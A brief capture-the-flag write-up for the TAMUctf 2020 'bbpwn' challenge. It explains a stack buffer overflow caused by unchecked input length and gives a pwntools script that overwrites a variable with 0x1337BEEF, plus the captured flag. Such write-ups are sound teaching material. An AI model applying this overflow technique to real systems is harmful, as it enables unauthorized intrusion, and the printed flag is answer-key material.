Rating:

Decompiled main:

![img/bbpwn_0](img/bbpwn_0)

the length of the input is not checked. We can therefore overwrite v5 with 0x1337BEEF

Exploit:

```python
from pwn import *

v5 = 0x1337BEEF

payload = (("A"*32).encode())
payload += p32(v5)

p = remote('challenges.tamuctf.com', 4252)
print(p.recvuntil(': ').decode())
p.sendline(payload)
print(p.recvall().decode())
```

# FLAG
```
gigem{0per4tion_skuld_74757474757275}
```

Original writeup (https://github.com/Internaut401/CTF_Writeup/blob/master/2020/TAMUctf/bbpwn.md).